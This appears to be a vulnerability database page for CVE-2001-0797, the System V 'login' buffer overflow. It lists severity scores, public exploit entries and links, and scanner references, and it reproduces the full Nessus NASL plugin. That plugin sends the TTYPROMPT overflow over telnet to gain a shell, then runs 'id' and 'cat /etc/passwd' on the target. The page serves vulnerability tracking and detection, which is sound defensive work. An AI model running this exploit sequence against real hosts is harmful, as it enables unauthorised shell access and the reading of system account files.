Vulnerabilities > CVE-2001-0797 - Buffer Overflow vulnerability in Multiple Vendor System V Derived 'login'

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
sgi
hp
ibm
sco
sun
critical
nessus
exploit available
metasploit
NVD
Published: 2001-12-12
Updated: 2018-10-30

Summary

Buffer overflow in login in various System V based operating systems allows remote attackers to execute arbitrary commands via a large number of arguments through services such as telnet and rlogin.

Vulnerable Configurations

Part Description Count
OS
Sgi
5
OS
Hp
8
OS
Ibm
5
OS
Sco
8
OS
Sun
17

Exploit-Db

  • descriptionSolaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability. CVE-2001-0797. Remote exploit for solaris platform
    idEDB-ID:21180
    last seen2016-02-02
    modified2004-12-04
    published2004-12-04
    reporterMarco Ivaldi
    sourcehttps://www.exploit-db.com/download/21180/
    titleSolaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability
  • descriptionSolaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass. CVE-2001-0797. Remote exploit for solaris platform
    idEDB-ID:57
    last seen2016-01-31
    modified2002-11-02
    published2002-11-02
    reporterJonathan S.
    sourcehttps://www.exploit-db.com/download/57/
    titleSolaris 2.6/7/8 TTYPROMPT in.telnet Remote Authentication Bypass
  • descriptionSolaris 2.x/7.0/8 Derived 'login' Buffer Overflow Vulnerability. CVE-2001-0797. Remote exploit for solaris platform
    idEDB-ID:21179
    last seen2016-02-02
    modified2003-01-09
    published2003-01-09
    reportersnooq
    sourcehttps://www.exploit-db.com/download/21179/
    titleSolaris 2.x/7.0/8 Derived 'login' Buffer Overflow Vulnerability
  • descriptionSystem V Derived /bin/login Extraneous Arguments Buffer Overflow. CVE-2001-0797. Remote exploit for linux platform
    idEDB-ID:16928
    last seen2016-02-02
    modified2010-07-03
    published2010-07-03
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/16928/
    titleSystem V Derived /bin/login Extraneous Arguments Buffer Overflow
  • descriptionSolaris in.telnetd TTYPROMPT Buffer Overflow. CVE-2001-0797. Remote exploit for solaris platform
    idEDB-ID:9917
    last seen2016-02-01
    modified2002-01-18
    published2002-01-18
    reporterMC
    sourcehttps://www.exploit-db.com/download/9917/
    titleSolaris in.telnetd TTYPROMPT - Buffer Overflow
  • descriptionSolaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit (SPARC). CVE-2001-0797. Remote exploit for solaris platform
    idEDB-ID:716
    last seen2016-01-31
    modified2004-12-24
    published2004-12-24
    reporterMarco Ivaldi
    sourcehttps://www.exploit-db.com/download/716/
    titleSolaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit SPARC
  • descriptionSystem V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based). CVE-2001-0797. Remote exploit for solaris platform
    idEDB-ID:10036
    last seen2016-02-01
    modified2001-12-12
    published2001-12-12
    reporterI)ruid
    sourcehttps://www.exploit-db.com/download/10036/
    titleSystem V Derived /bin/login Extraneous Arguments Buffer Overflow modem based
  • descriptionSolaris in.telnetd TTYPROMPT Buffer Overflow. CVE-2001-0797. Remote exploit for solaris platform
    idEDB-ID:16327
    last seen2016-02-01
    modified2010-06-22
    published2010-06-22
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/16327/
    titleSolaris in.telnetd TTYPROMPT Buffer Overflow
  • descriptionSolaris /bin/login Remote Root Exploit (SPARC/x86). CVE-2001-0797. Remote exploit for linux platform
    idEDB-ID:346
    last seen2016-01-31
    modified2001-12-20
    published2001-12-20
    reporterTeso
    sourcehttps://www.exploit-db.com/download/346/
    titleSolaris /bin/login Remote Root Exploit SPARC/x86

Metasploit

Nessus

  • NASL familyGain a shell remotely
    NASL idTTYPROMPT.NASL
    descriptionThe remote implementation of the /bin/login utility, used when authenticating a user via telnet or rsh contains an overflow which allows an attacker to gain a shell on this host, without even sending a shell code. An attacker may use this flaw to log in as any user (except root) on the remote host.
    last seen2020-06-01
    modified2020-06-02
    plugin id11136
    published2002-10-03
    reporterThis script is Copyright (C) 2002-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/11136
    titleMultiple OS /bin/login Remote Overflow
    code
    #
# (C) Tenable Network Security, Inc.
#  

include("compat.inc");

if (description)
{
 script_id(11136);
 script_version("1.27");
 script_cvs_date("Date: 2018/08/01 17:36:12");

 script_cve_id("CVE-2001-0797");
 script_bugtraq_id(3681, 5848);
 script_xref(name:"CERT-CC", value:"CA-2001-34");

 script_name(english:"Multiple OS /bin/login Remote Overflow");
 script_summary(english:"Attempts to log into the remote host");
 
 script_set_attribute(attribute:"synopsis", value:"It is possible to execute arbitrary commands on the remote host.");
 script_set_attribute(attribute:"description", value:
"The remote implementation of the /bin/login utility, used when
authenticating a user via telnet or rsh contains an overflow which
allows an attacker to gain a shell on this host, without even sending a
shell code. 

An attacker may use this flaw to log in as any user (except root) on the
remote host.");
 script_set_attribute(attribute:"solution", value:"Contact the vendor for a patch.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'Solaris in.telnetd TTYPROMPT Buffer Overflow');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
 script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
 script_set_attribute(attribute:"canvas_package", value:'CANVAS');

 script_set_attribute(attribute:"vuln_publication_date", value:"2001/12/12");
 script_set_attribute(attribute:"plugin_publication_date", value:"2002/10/03");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 # It might cause problem on some systems
 script_category(ACT_DESTRUCTIVE_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2002-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
 script_family(english:"Gain a shell remotely");
 script_dependencie("find_service1.nasl");
 script_require_ports("Services/telnet", 23);
 exit(0);
}

include("data_protection.inc");

global_var soc;

function init()
{
 local_var c, i, lim, r, s;

 send(socket:soc, data:raw_string(
 	0xFF, 252, 0x25,
	0xFF, 254, 0x26,
	0xFF, 252, 0x26,
	0xFF, 254, 0x03,
	0xFF, 252, 0x18,
	0xFF, 252, 0x1F,
	0xFF, 252, 0x20,
	0xFF, 252, 0x21,
	0xFF, 252, 0x22,
	0xFF, 0xFB, 0x27,
	0xFF, 254, 0x05,
	0xFF, 252, 0x23));
 r = recv(socket:soc, length:30);
 lim = strlen(r);
 for(i=0;i<lim - 2;i=i+3)
 {
  if(!(ord(r[i+2]) == 0x27))
  {
  if(ord(r[i+1]) == 251) c = 254;
  if(ord(r[i+1]) == 252) c = 254;
  if(ord(r[i+1]) == 253) c = 252;
  if(ord(r[i+1]) == 254) c = 252;
  
  s = raw_string(ord(r[i]), c, ord(r[i+2]));
  send(socket:soc, data:s);
  }
 }
 
 
 send(socket:soc, data:raw_string(0xFF, 0xFC, 0x24));
 
 
 r = recv(socket:soc, length:300);
 
 send(socket:soc, data:raw_string(0xFF, 0xFA, 0x27, 0x00, 0x03, 0x54, 0x54, 0x59, 0x50, 0x52, 0x4F, 0x4D, 0x50, 0x54, 0x01, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0xFF, 0xF0));
}

port = get_kb_item("Services/telnet");
if(!port)port = 23;

if(!get_port_state(port))exit(0);

soc = open_sock_tcp(port);

if(soc)
{
  buf = init();
  send(socket:soc, data:string("bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\r\n"));
  r = recv(socket:soc, length:4096);
  if(!r)exit(0);
  send(socket:soc, data:string("id\r\n"));
  r = recv(socket:soc, length:1024);
  if("uid=" >< r){
   send(socket:soc, data:string("cat /etc/passwd\r\n"));
   r = recv(socket:soc, length:4096);
   r = data_protection::redact_etc_passwd(output:r);
   report = string("Here is the output of the command 'cat /etc/passwd' :\n", r);
   security_hole(port:port, extra:report);
  }
}
  • NASL familyGain a shell remotely
    NASL idBINLOGIN_OVERFLOW_TELNET.NASL
    descriptionThe remote /bin/login seems to crash when it receives too many environment variables. This is likely due to a buffer overflow vulnerability which might allow an attacker to execute arbitrary code on the remote host.
    last seen2020-06-01
    modified2020-06-02
    plugin id10827
    published2001-12-15
    reporterThis script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/10827
    titleSysV /bin/login Environment Remote Overflow (telnet check)
  • NASL familyGain a shell remotely
    NASL idBINLOGIN_OVERFLOW_RLOGIN.NASL
    descriptionThe remote /bin/login seems to crash when it receives too many environment variables. This is likely due to a buffer overflow vulnerability which might allow an attacker to execute arbitrary code on the remote host.
    last seen2020-06-01
    modified2020-06-02
    plugin id10828
    published2001-12-15
    reporterThis script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/10828
    titleSysV /bin/login Environment Remote Overflow (rlogin)

Oval

accepted2005-02-23T09:25:00.000-04:00
classvulnerability
contributors
nameBrian Soby
organizationThe MITRE Corporation
descriptionBuffer overflow in login in various System V based operating systems allows remote attackers to execute arbitrary commands via a large number of arguments through services such as telnet and rlogin.
familyunix
idoval:org.mitre.oval:def:2025
statusaccepted
submitted2004-12-29T12:00:00.000-04:00
titleSystem V login Buffer Overflow
version35

Packetstorm

Saint

bid3681
descriptionSystem V login argument array buffer overflow
idshell_loginbo
osvdb690
titlesystemv_login
typeremote

Seebug

  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:62958
    last seen2017-11-19
    modified2014-07-01
    published2014-07-01
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-62958
    titleSolaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)
  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:75016
    last seen2017-11-19
    modified2014-07-01
    published2014-07-01
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-75016
    titleSolaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability
  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:8658
    last seen2017-11-19
    modified2008-06-05
    published2008-06-05
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-8658
    titleSolaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit (SPARC)

References